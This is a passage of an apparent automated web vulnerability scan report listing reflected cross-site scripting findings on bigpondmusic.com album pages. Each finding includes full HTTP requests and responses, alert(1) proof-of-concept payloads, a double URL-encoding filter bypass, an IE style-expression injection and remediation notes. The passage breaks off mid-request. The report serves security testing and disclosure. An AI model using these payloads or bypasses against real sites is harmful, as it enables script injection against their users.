Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88515


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumc1bf9';287a2412129';
   s.prop4 = 'grinderman';
   s.prop5 = 'worm-tamer';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '
...[SNIP]...

2.59. http://bigpondmusic.com/album/grinderman/worm-tamer [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/grinderman/worm-tamer

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95602%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd7e35b9c6e was submitted in the REST URL parameter 1. This input was echoed as 95602"><script>alert(1)</script>bd7e35b9c6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album95602%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd7e35b9c6e/grinderman/worm-tamer HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88217


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album95602"><script>alert(1)</script>bd7e35b9c6e/grinderman/worm-tamer" />
...[SNIP]...

2.60. http://bigpondmusic.com/album/grinderman/worm-tamer [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/grinderman/worm-tamer

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2673"style%3d"x%3aexpression(alert(1))"545b5603757 was submitted in the h parameter. This input was echoed as d2673"style="x:expression(alert(1))"545b5603757 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/grinderman/worm-tamer?h=764552781d2673"style%3d"x%3aexpression(alert(1))"545b5603757 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 106667


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Grinderman - Worm Tamer - Bi
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/grinderman/worm-tamer?h=764552781d2673"style="x:expression(alert(1))"545b5603757" />
...[SNIP]...

2.61. http://bigpondmusic.com/album/grinderman/worm-tamer [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/grinderman/worm-tamer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f27a"style%3d"x%3aexpression(alert(1))"0807d081f23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f27a"style="x:expression(alert(1))"0807d081f23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/grinderman/worm-tamer?6f27a"style%3d"x%3aexpression(alert(1))"0807d081f23=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 106658


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Grinderman - Worm Tamer - Bi
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/grinderman/worm-tamer?6f27a"style="x:expression(alert(1))"0807d081f23=1" />
...[SNIP]...

2.62. http://bigpondmusic.com/album/guy-sebastian/twenty-ten/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/guy-sebastian/twenty-ten/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba08d'%3b1e196c98b41 was submitted in the REST URL parameter 1. This input was echoed as ba08d';1e196c98b41 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumba08d'%3b1e196c98b41/guy-sebastian/twenty-ten/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88225


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumba08d';1e196c98b41';
   s.prop4 = 'guy-sebastian';
   s.prop5 = 'twenty-ten';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3
...[SNIP]...

2.63. http://bigpondmusic.com/album/guy-sebastian/twenty-ten/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/guy-sebastian/twenty-ten/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3ae8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e70c377bcd85 was submitted in the REST URL parameter 1. This input was echoed as e3ae8"><script>alert(1)</script>70c377bcd85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albume3ae8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e70c377bcd85/guy-sebastian/twenty-ten/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88448


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albume3ae8"><script>alert(1)</script>70c377bcd85/guy-sebastian/twenty-ten/" />
...[SNIP]...

2.64. http://bigpondmusic.com/album/guy-sebastian/twenty-ten/ [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/guy-sebastian/twenty-ten/

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75d86"style%3d"x%3aexpression(alert(1))"8fb9c4a702b was submitted in the cid parameter. This input was echoed as 75d86"style="x:expression(alert(1))"8fb9c4a702b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/guy-sebastian/twenty-ten/?cid=hm-guy75d86"style%3d"x%3aexpression(alert(1))"8fb9c4a702b HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 148108


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Guy Sebastian - Twenty Ten -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/guy-sebastian/twenty-ten/?cid=hm-guy75d86"style="x:expression(alert(1))"8fb9c4a702b" />
...[SNIP]...

2.65. http://bigpondmusic.com/album/guy-sebastian/twenty-ten/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/guy-sebastian/twenty-ten/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3d1b"style%3d"x%3aexpression(alert(1))"2964101664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3d1b"style="x:expression(alert(1))"2964101664 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/guy-sebastian/twenty-ten/?d3d1b"style%3d"x%3aexpression(alert(1))"2964101664=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 148112


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Guy Sebastian - Twenty Ten -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/guy-sebastian/twenty-ten/?d3d1b"style="x:expression(alert(1))"2964101664=1" />
...[SNIP]...

2.66. http://bigpondmusic.com/album/james-blunt/some-kind-of-trouble [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/james-blunt/some-kind-of-trouble

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74bc7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d6147d7b3b was submitted in the REST URL parameter 1. This input was echoed as 74bc7"><script>alert(1)</script>3d6147d7b3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album74bc7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d6147d7b3b/james-blunt/some-kind-of-trouble HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87993


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album74bc7"><script>alert(1)</script>3d6147d7b3b/james-blunt/some-kind-of-trouble" />
...[SNIP]...

2.67. http://bigpondmusic.com/album/james-blunt/some-kind-of-trouble [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/james-blunt/some-kind-of-trouble

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e73c'%3bae196294df9 was submitted in the REST URL parameter 1. This input was echoed as 4e73c';ae196294df9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album4e73c'%3bae196294df9/james-blunt/some-kind-of-trouble HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album4e73c';ae196294df9';
   s.prop4 = 'james-blunt';
   s.prop5 = 'some-kind-of-trouble';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' +
...[SNIP]...

2.68. http://bigpondmusic.com/album/james-blunt/some-kind-of-trouble [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/james-blunt/some-kind-of-trouble

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804a1"style%3d"x%3aexpression(alert(1))"cc0e770a23b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 804a1"style="x:expression(alert(1))"cc0e770a23b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/james-blunt/some-kind-of-trouble?804a1"style%3d"x%3aexpression(alert(1))"cc0e770a23b=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123452


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>James Blunt - Some Kind Of T
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/james-blunt/some-kind-of-trouble?804a1"style="x:expression(alert(1))"cc0e770a23b=1" />
...[SNIP]...

2.69. http://bigpondmusic.com/album/jebediah/lost-my-nerve [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/jebediah/lost-my-nerve

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a220%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30cfeaa9154 was submitted in the REST URL parameter 1. This input was echoed as 8a220"><script>alert(1)</script>30cfeaa9154 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album8a220%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30cfeaa9154/jebediah/lost-my-nerve HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88077


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album8a220"><script>alert(1)</script>30cfeaa9154/jebediah/lost-my-nerve" />
...[SNIP]...

2.70. http://bigpondmusic.com/album/jebediah/lost-my-nerve [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/jebediah/lost-my-nerve

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b225c'%3bbfd4f81406a was submitted in the REST URL parameter 1. This input was echoed as b225c';bfd4f81406a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumb225c'%3bbfd4f81406a/jebediah/lost-my-nerve HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
